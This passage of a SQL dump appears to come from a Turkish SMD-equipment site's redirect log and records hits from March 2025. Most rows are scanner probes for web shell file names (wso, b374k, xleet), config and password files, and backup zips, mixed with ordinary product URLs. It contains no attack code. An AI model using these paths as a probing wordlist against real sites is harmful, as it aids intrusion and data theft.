15:50:44','0000-00-00 00:00:00',301),(37906,'http://3s-technologies.com.tr/tr/wp-includes/text/plugins.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:51:11','0000-00-00 00:00:00',301),(37907,'http://3s-technologies.com.tr/tr/wp-includes/certificates/plugins.php',NULL,'http://google.com/','',46,0,'2025-03-08 15:51:16','0000-00-00 00:00:00',301),(37908,'http://3s-technologies.com.tr/tr/wp-includes/id3/moon.php',NULL,'http://google.com/','',2,0,'2025-03-08 15:51:21','0000-00-00 00:00:00',301),(37909,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/namespaced/core/curve25519/ge/wp.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:51:34','0000-00-00 00:00:00',301),(37910,'http://3s-technologies.com.tr/tr/wp-content/function.php',NULL,'http://google.com/','',60,0,'2025-03-08 15:51:41','0000-00-00 00:00:00',301),(37911,'http://3s-technologies.com.tr/tr/wp-includes/requests/text/index.php',NULL,'http://google.com/','',6,0,'2025-03-08 15:51:51','0000-00-00 00:00:00',301),(37912,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/admin.php',NULL,'http://google.com/','',6,0,'2025-03-08 15:51:54','0000-00-00 00:00:00',301),(37913,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/plugins.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:51:57','0000-00-00 00:00:00',301),(37914,'http://3s-technologies.com.tr/tr/cgi-bin/wp-login.php',NULL,'http://google.com/','',19,0,'2025-03-08 15:52:00','0000-00-00 00:00:00',301),(37915,'https://3s-technologies.com.tr/tr/style2.php',NULL,'','',3,0,'2025-03-08 16:55:27','0000-00-00 00:00:00',301),(37916,'https://3s-technologies.com.tr/tr/sidwso.php',NULL,'','',1,0,'2025-03-08 16:55:30','0000-00-00 00:00:00',301),(37917,'https://3s-technologies.com.tr/tr/wp-config.php',NULL,'','',19,0,'2025-03-08 16:55:34','0000-00-00 00:00:00',301),(37918,'https://3s-technologies.com.tr/tr/database.php',NULL,'','',2,0,'2025-03-08 16:55:39','0000-00-00 00:00:00',301),(37919,'https://3s-technologies.com.tr/tr/seo.php',NULL,'','',1,0,'2025-03-08 16:55:43','0000-00-00 00:00:00',301),(37920,'https://3s-technologies.com.tr/tr/json.php',NULL,'','',1,0,'2025-03-08 16:55:46','0000-00-00 00:00:00',301),(37921,'https://3s-technologies.com.tr/tr/hi.php',NULL,'','',1,0,'2025-03-08 16:55:48','0000-00-00 00:00:00',301),(37922,'https://3s-technologies.com.tr/tr/by.php',NULL,'','',2,0,'2025-03-08 16:55:50','0000-00-00 00:00:00',301),(37923,'https://3s-technologies.com.tr/tr/small.php',NULL,'','',2,0,'2025-03-08 16:55:53','0000-00-00 00:00:00',301),(37924,'https://3s-technologies.com.tr/tr/xmircpc.php',NULL,'','',1,0,'2025-03-08 16:55:59','0000-00-00 00:00:00',301),(37925,'https://3s-technologies.com.tr/tr/dcs.php',NULL,'','',2,0,'2025-03-08 16:56:10','0000-00-00 00:00:00',301),(37926,'https://3s-technologies.com.tr/tr/b374k.php',NULL,'','',1,0,'2025-03-08 16:56:14','0000-00-00 00:00:00',301),(37927,'https://3s-technologies.com.tr/tr/idx.php',NULL,'','',1,0,'2025-03-08 16:56:16','0000-00-00 00:00:00',301),(37928,'https://3s-technologies.com.tr/tr/shel.php',NULL,'','',1,0,'2025-03-08 16:56:18','0000-00-00 00:00:00',301),(37929,'https://3s-technologies.com.tr/tr/indosec.php',NULL,'','',1,0,'2025-03-08 16:56:22','0000-00-00 00:00:00',301),(37930,'https://3s-technologies.com.tr/tr/marjan.php',NULL,'','',1,0,'2025-03-08 16:56:27','0000-00-00 00:00:00',301),(37931,'https://3s-technologies.com.tr/tr/webadmin.php',NULL,'','',1,0,'2025-03-08 16:56:33','0000-00-00 00:00:00',301),(37932,'https://3s-technologies.com.tr/tr/up.php5',NULL,'','',1,0,'2025-03-08 16:56:38','0000-00-00 00:00:00',301),(37933,'https://3s-technologies.com.tr/tr/up.php7',NULL,'','',1,0,'2025-03-08 16:56:40','0000-00-00 00:00:00',301),(37934,'https://3s-technologies.com.tr/tr/wp-scr1pts.php',NULL,'','',1,0,'2025-03-08 16:57:09','0000-00-00 00:00:00',301),(37935,'https://3s-technologies.com.tr/tr/media-admin.php',NULL,'','',1,0,'2025-03-08 16:57:31','0000-00-00 00:00:00',301),(37936,'https://3s-technologies.com.tr/tr/wsoshell.php',NULL,'','',1,0,'2025-03-08 16:57:39','0000-00-00 00:00:00',301),(37937,'https://3s-technologies.com.tr/tr/88.php',NULL,'','',1,0,'2025-03-08 16:57:43','0000-00-00 00:00:00',301),(37938,'https://3s-technologies.com.tr/tr/exploit.php',NULL,'','',1,0,'2025-03-08 16:57:52','0000-00-00 00:00:00',301),(37939,'https://3s-technologies.com.tr/tr/rsx.php',NULL,'','',1,0,'2025-03-08 16:58:11','0000-00-00 00:00:00',301),(37940,'https://3s-technologies.com.tr/tr/sayangku.php',NULL,'','',1,0,'2025-03-08 16:58:22','0000-00-00 00:00:00',301),(37941,'https://3s-technologies.com.tr/tr/102.php',NULL,'','',1,0,'2025-03-08 16:58:23','0000-00-00 00:00:00',301),(37942,'https://3s-technologies.com.tr/tr/400.php',NULL,'','',1,0,'2025-03-08 16:58:24','0000-00-00 00:00:00',301),(37943,'https://3s-technologies.com.tr/tr/302.php',NULL,'','',1,0,'2025-03-08 16:58:26','0000-00-00 00:00:00',301),(37944,'https://3s-technologies.com.tr/tr/z3d007.php',NULL,'','',1,0,'2025-03-08 16:58:30','0000-00-00 00:00:00',301),(37945,'https://3s-technologies.com.tr/tr/erby.php',NULL,'','',1,0,'2025-03-08 16:58:31','0000-00-00 00:00:00',301),(37946,'https://3s-technologies.com.tr/tr/ox.php',NULL,'','',1,0,'2025-03-08 16:58:33','0000-00-00 00:00:00',301),(37947,'https://3s-technologies.com.tr/tr/pekok.php',NULL,'','',1,0,'2025-03-08 16:58:35','0000-00-00 00:00:00',301),(37948,'https://3s-technologies.com.tr/tr/naz.php',NULL,'','',1,0,'2025-03-08 16:58:37','0000-00-00 00:00:00',301),(37949,'https://3s-technologies.com.tr/tr/hehe.php',NULL,'','',1,0,'2025-03-08 16:58:41','0000-00-00 00:00:00',301),(37950,'https://3s-technologies.com.tr/tr/wso01.php',NULL,'','',2,0,'2025-03-08 16:58:46','0000-00-00 00:00:00',301),(37951,'https://3s-technologies.com.tr/tr/cgi.php',NULL,'','',1,0,'2025-03-08 16:58:52','0000-00-00 00:00:00',301),(37952,'https://3s-technologies.com.tr/tr/sh3ll.php',NULL,'','',2,0,'2025-03-08 16:59:01','0000-00-00 00:00:00',301),(37953,'https://3s-technologies.com.tr/tr/indox.php',NULL,'','',1,0,'2025-03-08 16:59:03','0000-00-00 00:00:00',301),(37954,'https://3s-technologies.com.tr/tr/xamppindex.php',NULL,'','',1,0,'2025-03-08 16:59:05','0000-00-00 00:00:00',301),(37955,'https://3s-technologies.com.tr/tr/xindex.php',NULL,'','',1,0,'2025-03-08 16:59:06','0000-00-00 00:00:00',301),(37956,'https://3s-technologies.com.tr/tr/xmlrpz.php',NULL,'','',1,0,'2025-03-08 16:59:07','0000-00-00 00:00:00',301),(37957,'https://3s-technologies.com.tr/tr/yapgb.php',NULL,'','',1,0,'2025-03-08 16:59:17','0000-00-00 00:00:00',301),(37958,'https://3s-technologies.com.tr/tr/wprahma.php',NULL,'','',1,0,'2025-03-08 16:59:25','0000-00-00 00:00:00',301),(37959,'https://3s-technologies.com.tr/tr/wp-wso.php',NULL,'','',1,0,'2025-03-08 16:59:29','0000-00-00 00:00:00',301),(37960,'https://3s-technologies.com.tr/tr/wsi.php',NULL,'','',1,0,'2025-03-08 16:59:30','0000-00-00 00:00:00',301),(37961,'https://3s-technologies.com.tr/tr/wwos.php',NULL,'','',1,0,'2025-03-08 16:59:39','0000-00-00 00:00:00',301),(37962,'https://3s-technologies.com.tr/tr/vita.php',NULL,'','',1,0,'2025-03-08 16:59:42','0000-00-00 00:00:00',301),(37963,'https://3s-technologies.com.tr/tr/update.php',NULL,'','',3,0,'2025-03-08 16:59:46','0000-00-00 00:00:00',301),(37964,'https://3s-technologies.com.tr/tr/upel.php',NULL,'','',1,0,'2025-03-08 16:59:46','0000-00-00 00:00:00',301),(37965,'https://3s-technologies.com.tr/tr/styles.php',NULL,'','',1,0,'2025-03-08 16:59:57','0000-00-00 00:00:00',301),(37966,'https://3s-technologies.com.tr/tr/qindex.php',NULL,'','',1,0,'2025-03-08 17:00:08','0000-00-00 00:00:00',301),(37967,'https://3s-technologies.com.tr/tr/root.php',NULL,'','',1,0,'2025-03-08 17:00:12','0000-00-00 00:00:00',301),(37968,'https://3s-technologies.com.tr/tr/rueiindex.php',NULL,'','',1,0,'2025-03-08 17:00:16','0000-00-00 00:00:00',301),(37969,'https://3s-technologies.com.tr/tr/scarbook.php',NULL,'','',1,0,'2025-03-08 17:00:21','0000-00-00 00:00:00',301),(37970,'https://3s-technologies.com.tr/tr/serverphp',NULL,'','',1,0,'2025-03-08 17:00:25','0000-00-00 00:00:00',301),(37971,'https://3s-technologies.com.tr/tr/seter.php',NULL,'','',1,0,'2025-03-08 17:00:26','0000-00-00 00:00:00',301),(37972,'https://3s-technologies.com.tr/tr/shareduserlogin.php',NULL,'','',1,0,'2025-03-08 17:00:28','0000-00-00 00:00:00',301),(37973,'https://3s-technologies.com.tr/tr/olu.php',NULL,'','',1,0,'2025-03-08 17:00:32','0000-00-00 00:00:00',301),(37974,'https://3s-technologies.com.tr/tr/omda.php',NULL,'','',1,0,'2025-03-08 17:00:35','0000-00-00 00:00:00',301),(37975,'https://3s-technologies.com.tr/tr/meta.php',NULL,'','',1,0,'2025-03-08 17:00:36','0000-00-00 00:00:00',301),(37976,'https://3s-technologies.com.tr/tr/license.php',NULL,'','',2,0,'2025-03-08 17:00:46','0000-00-00 00:00:00',301),(37977,'https://3s-technologies.com.tr/tr/login.php',NULL,'','',3,0,'2025-03-08 17:00:47','0000-00-00 00:00:00',301),(37978,'https://3s-technologies.com.tr/tr/logo_img.php',NULL,'','',1,0,'2025-03-08 17:00:48','0000-00-00 00:00:00',301),(37979,'https://3s-technologies.com.tr/tr/lol.php',NULL,'','',1,0,'2025-03-08 17:00:50','0000-00-00 00:00:00',301),(37980,'https://3s-technologies.com.tr/tr/larva.php',NULL,'','',2,0,'2025-03-08 17:00:56','0000-00-00 00:00:00',301),(37981,'https://3s-technologies.com.tr/tr/legion.php',NULL,'','',1,0,'2025-03-08 17:01:01','0000-00-00 00:00:00',301),(37982,'https://3s-technologies.com.tr/tr/index2.php',NULL,'','',1,0,'2025-03-08 17:01:12','0000-00-00 00:00:00',301),(37983,'https://3s-technologies.com.tr/tr/help.php',NULL,'','',1,0,'2025-03-08 17:01:14','0000-00-00 00:00:00',301),(37984,'https://3s-technologies.com.tr/tr/hiking-giardia.php',NULL,'','',1,0,'2025-03-08 17:01:16','0000-00-00 00:00:00',301),(37985,'https://3s-technologies.com.tr/tr/home.php',NULL,'','',3,0,'2025-03-08 17:01:17','0000-00-00 00:00:00',301),(37986,'https://3s-technologies.com.tr/tr/frontend_dev.php',NULL,'','',1,0,'2025-03-08 17:01:23','0000-00-00 00:00:00',301),(37987,'https://3s-technologies.com.tr/tr/gaestebuch.php',NULL,'','',1,0,'2025-03-08 17:01:25','0000-00-00 00:00:00',301),(37988,'https://3s-technologies.com.tr/tr/gastenboek.php',NULL,'','',1,0,'2025-03-08 17:01:27','0000-00-00 00:00:00',301),(37989,'https://3s-technologies.com.tr/tr/gb.php',NULL,'','',1,0,'2025-03-08 17:01:31','0000-00-00 00:00:00',301),(37990,'https://3s-technologies.com.tr/tr/getcfg.php',NULL,'','',1,0,'2025-03-08 17:01:35','0000-00-00 00:00:00',301),(37991,'https://3s-technologies.com.tr/tr/get_password.php',NULL,'','',1,0,'2025-03-08 17:01:38','0000-00-00 00:00:00',301),(37992,'https://3s-technologies.com.tr/tr/backupwp-login.php',NULL,'','',1,0,'2025-03-08 17:01:39','0000-00-00 00:00:00',301),(37993,'https://3s-technologies.com.tr/tr/bakindex.php',NULL,'','',1,0,'2025-03-08 17:01:43','0000-00-00 00:00:00',301),(37994,'https://3s-technologies.com.tr/tr/base.php',NULL,'','',1,0,'2025-03-08 17:01:46','0000-00-00 00:00:00',301),(37995,'https://3s-technologies.com.tr/tr/bbsindex.php',NULL,'','',1,0,'2025-03-08 17:01:49','0000-00-00 00:00:00',301),(37996,'https://3s-technologies.com.tr/tr/bbs.php',NULL,'','',1,0,'2025-03-08 17:01:53','0000-00-00 00:00:00',301),(37997,'https://3s-technologies.com.tr/tr/alexuse.php',NULL,'','',1,0,'2025-03-08 17:01:56','0000-00-00 00:00:00',301),(37998,'https://3s-technologies.com.tr/tr/alfindex.php',NULL,'','',1,0,'2025-03-08 17:02:03','0000-00-00 00:00:00',301),(37999,'https://3s-technologies.com.tr/tr/403.php',NULL,'','',3,0,'2025-03-08 17:02:13','0000-00-00 00:00:00',301),(38000,'https://3s-technologies.com.tr/tr/87.php',NULL,'','',1,0,'2025-03-08 17:02:25','0000-00-00 00:00:00',301),(38001,'https://3s-technologies.com.tr/tr/100.php',NULL,'','',1,0,'2025-03-08 17:02:32','0000-00-00 00:00:00',301),(38002,'https://3s-technologies.com.tr/tr/123.php',NULL,'','',1,0,'2025-03-08 17:02:36','0000-00-00 00:00:00',301),(38003,'https://3s-technologies.com.tr/tr/rex.php',NULL,'','',1,0,'2025-03-08 17:02:43','0000-00-00 00:00:00',301),(38004,'https://3s-technologies.com.tr/tr/nqgo2.php',NULL,'','',1,0,'2025-03-08 17:02:46','0000-00-00 00:00:00',301),(38005,'https://3s-technologies.com.tr/tr/yecyq.php',NULL,'','',1,0,'2025-03-08 17:02:50','0000-00-00 00:00:00',301),(38006,'https://3s-technologies.com.tr/tr/xleet.php',NULL,'','',3,0,'2025-03-08 17:02:52','0000-00-00 00:00:00',301),(38007,'https://3s-technologies.com.tr/tr/aboutus.php',NULL,'','',1,0,'2025-03-08 17:02:57','0000-00-00 00:00:00',301),(38008,'https://3s-technologies.com.tr/tr/bingo.php',NULL,'','',1,0,'2025-03-08 17:02:58','0000-00-00 00:00:00',301),(38009,'https://3s-technologies.com.tr/tr/chk.php',NULL,'','',1,0,'2025-03-08 17:02:59','0000-00-00 00:00:00',301),(38010,'https://3s-technologies.com.tr/tr/phpmailer.php',NULL,'','',1,0,'2025-03-08 17:03:02','0000-00-00 00:00:00',301),(38011,'https://3s-technologies.com.tr/tr/common.php',NULL,'','',1,0,'2025-03-08 17:03:04','0000-00-00 00:00:00',301),(38012,'https://3s-technologies.com.tr/tr/config.inc.php',NULL,'','',2,0,'2025-03-08 17:03:07','0000-00-00 00:00:00',301),(38013,'https://3s-technologies.com.tr/tr/config.php',NULL,'','',12,0,'2025-03-08 17:03:09','0000-00-00 00:00:00',301),(38014,'https://3s-technologies.com.tr/tr/cs.php',NULL,'','',1,0,'2025-03-08 17:03:11','0000-00-00 00:00:00',301),(38015,'https://3s-technologies.com.tr/tr/demo.html',NULL,'','',1,0,'2025-03-08 17:03:13','0000-00-00 00:00:00',301),(38016,'https://3s-technologies.com.tr/tr/demo.php',NULL,'','',1,0,'2025-03-08 17:03:15','0000-00-00 00:00:00',301),(38017,'https://3s-technologies.com.tr/tr/fileman.php',NULL,'','',1,0,'2025-03-08 17:03:17','0000-00-00 00:00:00',301),(38018,'https://3s-technologies.com.tr/tr/fonts.css',NULL,'','',1,0,'2025-03-08 17:03:19','0000-00-00 00:00:00',301),(38019,'https://3s-technologies.com.tr/tr/footer.php',NULL,'','',1,0,'2025-03-08 17:03:21','0000-00-00 00:00:00',301),(38020,'https://3s-technologies.com.tr/tr/geko.php',NULL,'','',1,0,'2025-03-08 17:03:24','0000-00-00 00:00:00',301),(38021,'https://3s-technologies.com.tr/tr/hotnews.php',NULL,'','',1,0,'2025-03-08 17:03:26','0000-00-00 00:00:00',301),(38022,'https://3s-technologies.com.tr/tr/ip.php',NULL,'','',1,0,'2025-03-08 17:03:32','0000-00-00 00:00:00',301),(38023,'http://3s-technologies.com.tr/en/siteheads.php',NULL,'www.google.com','',7,0,'2025-03-09 17:38:19','0000-00-00 00:00:00',301),(38024,'http://3s-technologies.com.tr/en/wp-content/siteheads.php',NULL,'www.google.com','',4,0,'2025-03-09 17:38:22','0000-00-00 00:00:00',301),(38025,'http://3s-technologies.com.tr/en/ajax/siteheads.php',NULL,'www.google.com','',1,0,'2025-03-09 17:38:26','0000-00-00 00:00:00',301),(38026,'http://3s-technologies.com.tr/en/assets/images/siteheads.php',NULL,'www.google.com','',1,0,'2025-03-09 17:38:28','0000-00-00 00:00:00',301),(38027,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,product_sku?language=tr-tr',NULL,'','',1,0,'2025-03-10 10:42:46','0000-00-00 00:00:00',301),(38028,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,product_sku',NULL,'','',17,0,'2025-03-10 10:42:50','0000-00-00 00:00:00',301),(38029,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/cm-602-l-detail/askquestion?tmpl=component',NULL,'','',7,0,'2025-03-10 10:42:51','0000-00-00 00:00:00',301),(38030,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/dirdesc',NULL,'','',14,0,'2025-03-10 10:42:52','0000-00-00 00:00:00',301),(38031,'https://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,`p`.product_sku',NULL,'','',13,0,'2025-03-10 10:45:00','0000-00-00 00:00:00',301),(38032,'https://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',14,0,'2025-03-10 10:45:01','0000-00-00 00:00:00',301),(38033,'https://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,product_name',NULL,'','',14,0,'2025-03-10 10:45:14','0000-00-00 00:00:00',301),(38034,'https://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,product_name/dirdesc',NULL,'','',14,0,'2025-03-10 10:45:15','0000-00-00 00:00:00',301),(38035,'https://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,product_sku',NULL,'','',15,0,'2025-03-10 10:45:16','0000-00-00 00:00:00',301),(38036,'https://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/dirdesc',NULL,'','',16,0,'2025-03-10 10:45:18','0000-00-00 00:00:00',301),(38037,'https://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/ess-310-24-detail',NULL,'','',8,0,'2025-03-10 10:45:20','0000-00-00 00:00:00',301),(38038,'https://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',10,0,'2025-03-10 10:45:21','0000-00-00 00:00:00',301),(38039,'https://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/ess-310-detail',NULL,'','',10,0,'2025-03-10 10:45:22','0000-00-00 00:00:00',301),(38040,'https://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',10,0,'2025-03-10 10:45:23','0000-00-00 00:00:00',301),(38041,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',18,0,'2025-03-10 10:45:58','0000-00-00 00:00:00',301),(38042,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,ordering?language=en-gb',NULL,'','',1,0,'2025-03-10 10:46:02','0000-00-00 00:00:00',301),(38043,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,category_name/dirdesc',NULL,'','',12,0,'2025-03-10 10:46:33','0000-00-00 00:00:00',301),(38044,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,mf_name',NULL,'','',8,0,'2025-03-10 10:46:36','0000-00-00 00:00:00',301),(38045,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/cs40-detail/askquestion?tmpl=component',NULL,'','',6,0,'2025-03-10 10:47:00','0000-00-00 00:00:00',301),(38046,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/le-40v-detail',NULL,'','',6,0,'2025-03-10 10:47:03','0000-00-00 00:00:00',301),(38047,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/le-40v-detail/askquestion?tmpl=component',NULL,'','',6,0,'2025-03-10 10:47:04','0000-00-00 00:00:00',301),(38048,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/ls60v-detail',NULL,'','',6,0,'2025-03-10 10:47:05','0000-00-00 00:00:00',301),(38049,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/ls60v-detail/askquestion?tmpl=component',NULL,'','',6,0,'2025-03-10 10:47:06','0000-00-00 00:00:00',301),(38050,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',23,0,'2025-03-10 10:47:30','0000-00-00 00:00:00',301),(38051,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,category_name',NULL,'','',25,0,'2025-03-10 10:47:33','0000-00-00 00:00:00',301),(38052,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,mf_name',NULL,'','',22,0,'2025-03-10 10:47:37','0000-00-00 00:00:00',301),(38053,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc',NULL,'','',20,0,'2025-03-10 10:47:38','0000-00-00 00:00:00',301),(38054,'http://3s-technologies.com.tr/tr/wp.zip',NULL,'','',3,0,'2025-03-10 12:20:08','0000-00-00 00:00:00',301),(38055,'http://3s-technologies.com.tr/tr/files.zip',NULL,'','',3,0,'2025-03-10 12:20:09','0000-00-00 00:00:00',301),(38056,'https://3s-technologies.com.tr/en/auth.json',NULL,'','',1,0,'2025-03-11 04:39:43','0000-00-00 00:00:00',301),(38057,'http://3s-technologies.com.tr/tr/web.zip',NULL,'','',4,0,'2025-03-13 12:14:47','0000-00-00 00:00:00',301),(38058,'http://3s-technologies.com.tr/tr/bkp.zip',NULL,'','',1,0,'2025-03-13 17:56:22','0000-00-00 00:00:00',301),(38059,'http://3s-technologies.com.tr/tr/bk.zip',NULL,'','',1,0,'2025-03-13 17:56:23','0000-00-00 00:00:00',301),(38060,'https://3s-technologies.com.tr/tr/wp-content/plugins/ioxi/retu.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/ioxi/retu.php','',2,0,'2025-03-13 23:42:45','0000-00-00 00:00:00',301),(38061,'https://3s-technologies.com.tr/tr/kean.php',NULL,'https://3s-technologies.com.tr//kean.php','',2,0,'2025-03-13 23:42:45','0000-00-00 00:00:00',301),(38062,'https://3s-technologies.com.tr/tr/first.php',NULL,'https://3s-technologies.com.tr//first.php','',2,0,'2025-03-13 23:42:46','0000-00-00 00:00:00',301),(38063,'https://3s-technologies.com.tr/tr/wp-content/uploads/2024/01/rxr.php',NULL,'https://3s-technologies.com.tr//wp-content/uploads/2024/01/RxR.php','',2,0,'2025-03-13 23:42:47','0000-00-00 00:00:00',301),(38064,'https://3s-technologies.com.tr/tr/wp-includes/blocks/post-title/post-title/index.php',NULL,'https://3s-technologies.com.tr//wp-includes/blocks/post-title/post-title/index.php','',2,0,'2025-03-13 23:42:48','0000-00-00 00:00:00',301),(38065,'https://3s-technologies.com.tr/tr/wp-includes/js/dist/dist/index.php',NULL,'https://3s-technologies.com.tr//wp-includes/js/dist/dist/index.php','',2,0,'2025-03-13 23:42:48','0000-00-00 00:00:00',301),(38066,'https://3s-technologies.com.tr/tr/wp-includes/blocks/page-list/page-list/index.php',NULL,'https://3s-technologies.com.tr//wp-includes/blocks/page-list/page-list/index.php','',2,0,'2025-03-13 23:42:49','0000-00-00 00:00:00',301),(38067,'https://3s-technologies.com.tr/tr/wp-maps.php',NULL,'https://3s-technologies.com.tr//wp-maps.php','',2,0,'2025-03-13 23:42:51','0000-00-00 00:00:00',301),(38068,'https://3s-technologies.com.tr/tr/wp-content/themes/divi/404.php',NULL,'https://3s-technologies.com.tr//wp-content/themes/Divi/404.php','',2,0,'2025-03-13 23:42:51','0000-00-00 00:00:00',301),(38069,'https://3s-technologies.com.tr/tr/wp-admin/includes/nav.php',NULL,'https://3s-technologies.com.tr//wp-admin/includes/nav.php','',2,0,'2025-03-13 23:42:52','0000-00-00 00:00:00',301),(38070,'https://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core32/curve25519/ge/core32.php',NULL,'https://3s-technologies.com.tr//wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Core32.php','',2,0,'2025-03-13 23:42:53','0000-00-00 00:00:00',301),(38071,'https://3s-technologies.com.tr/tr/heh.php',NULL,'https://3s-technologies.com.tr//heh.php','',2,0,'2025-03-13 23:42:54','0000-00-00 00:00:00',301),(38072,'https://3s-technologies.com.tr/tr/newfile.php',NULL,'https://3s-technologies.com.tr//NewFile.php','',2,0,'2025-03-13 23:42:54','0000-00-00 00:00:00',301),(38073,'https://3s-technologies.com.tr/tr/wp-content/plugins/view-more/ioxi.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/view-more/ioxi.php','',2,0,'2025-03-13 23:42:55','0000-00-00 00:00:00',301),(38074,'https://3s-technologies.com.tr/tr/baxa1.php7',NULL,'https://3s-technologies.com.tr//baxa1.php7','',2,0,'2025-03-13 23:42:56','0000-00-00 00:00:00',301),(38075,'https://3s-technologies.com.tr/tr/wp-content/plugins/erinyani/baxa1.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/erinyani/baxa1.php','',2,0,'2025-03-13 23:42:57','0000-00-00 00:00:00',301),(38076,'https://3s-technologies.com.tr/tr/wp-content/plugins/seoxx/randkeyword.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/seoxx/randkeyword.php','',2,0,'2025-03-13 23:42:58','0000-00-00 00:00:00',301),(38077,'https://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/zmfm.php',NULL,'https://3s-technologies.com.tr//wp-includes/sitemaps/providers/zmFM.php','',2,0,'2025-03-13 23:42:58','0000-00-00 00:00:00',301),(38078,'https://3s-technologies.com.tr/tr/wp-includes/pomo/zmfm.php',NULL,'https://3s-technologies.com.tr//wp-includes/pomo/zmFM.php','',2,0,'2025-03-13 23:42:59','0000-00-00 00:00:00',301),(38079,'https://3s-technologies.com.tr/tr/wp-content/plugins/backup_index.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/backup_index.php','',2,0,'2025-03-13 23:43:00','0000-00-00 00:00:00',301),(38080,'https://3s-technologies.com.tr/tr/wp-content/plugins/three-column-screen-layout/db.php?u',NULL,'https://3s-technologies.com.tr//wp-content/plugins/three-column-screen-layout/db.php?u','',2,0,'2025-03-13 23:43:01','0000-00-00 00:00:00',301),(38081,'https://3s-technologies.com.tr/tr/wp-content/plugins/vwcleanerplugin/bump.php?cache',NULL,'https://3s-technologies.com.tr//wp-content/plugins/vwcleanerplugin/bump.php?cache','',2,0,'2025-03-13 23:43:01','0000-00-00 00:00:00',301),(38082,'https://3s-technologies.com.tr/tr/wp-content/themes/twentytwentythree/patterns/index.php',NULL,'https://3s-technologies.com.tr/wp-content/themes/twentytwentythree/patterns/index.php','',2,0,'2025-03-13 23:43:02','0000-00-00 00:00:00',301),(38083,'https://3s-technologies.com.tr/tr/wp-content/themes/too.php',NULL,'https://3s-technologies.com.tr//wp-content/themes/too.php','',2,0,'2025-03-13 23:43:03','0000-00-00 00:00:00',301),(38084,'https://3s-technologies.com.tr/tr/about.php?525',NULL,'https://3s-technologies.com.tr//about.php?525','',1,0,'2025-03-13 23:43:04','0000-00-00 00:00:00',301),(38085,'https://3s-technologies.com.tr/tr/wp-admin/images/mhbgf.php',NULL,'https://3s-technologies.com.tr//wp-admin/images/Mhbgf.php','',2,0,'2025-03-13 23:43:04','0000-00-00 00:00:00',301),(38086,'https://3s-technologies.com.tr/tr/wp-content/mich-rep.php',NULL,'https://3s-technologies.com.tr//wp-content/mich-REP.php','',2,0,'2025-03-13 23:43:05','0000-00-00 00:00:00',301),(38087,'https://3s-technologies.com.tr/tr/wp-content/upgrade/about.php',NULL,'https://3s-technologies.com.tr//wp-content/upgrade/about.php','',2,0,'2025-03-13 23:43:06','0000-00-00 00:00:00',301),(38088,'https://3s-technologies.com.tr/tr/wp-includes/pomo/pomo.php',NULL,'https://3s-technologies.com.tr//wp-includes/pomo/pomo.php','',2,0,'2025-03-13 23:43:07','0000-00-00 00:00:00',301),(38089,'https://3s-technologies.com.tr/tr/wp-admin/css/go.php',NULL,'https://3s-technologies.com.tr//wp-admin/css/go.php','',2,0,'2025-03-13 23:43:08','0000-00-00 00:00:00',301),(38090,'https://3s-technologies.com.tr/tr/wp-includes/pomo/yellow.php',NULL,'https://3s-technologies.com.tr//wp-includes/pomo/yellow.php','',2,0,'2025-03-13 23:43:08','0000-00-00 00:00:00',301),(38091,'https://3s-technologies.com.tr/tr/click.php',NULL,'https://3s-technologies.com.tr//click.php','',2,0,'2025-03-13 23:43:09','0000-00-00 00:00:00',301),(38092,'https://3s-technologies.com.tr/tr/termps.php',NULL,'https://3s-technologies.com.tr//termps.php','',2,0,'2025-03-13 23:43:10','0000-00-00 00:00:00',301),(38093,'https://3s-technologies.com.tr/tr/sck.php',NULL,'https://3s-technologies.com.tr//sck.php','',2,0,'2025-03-13 23:43:11','0000-00-00 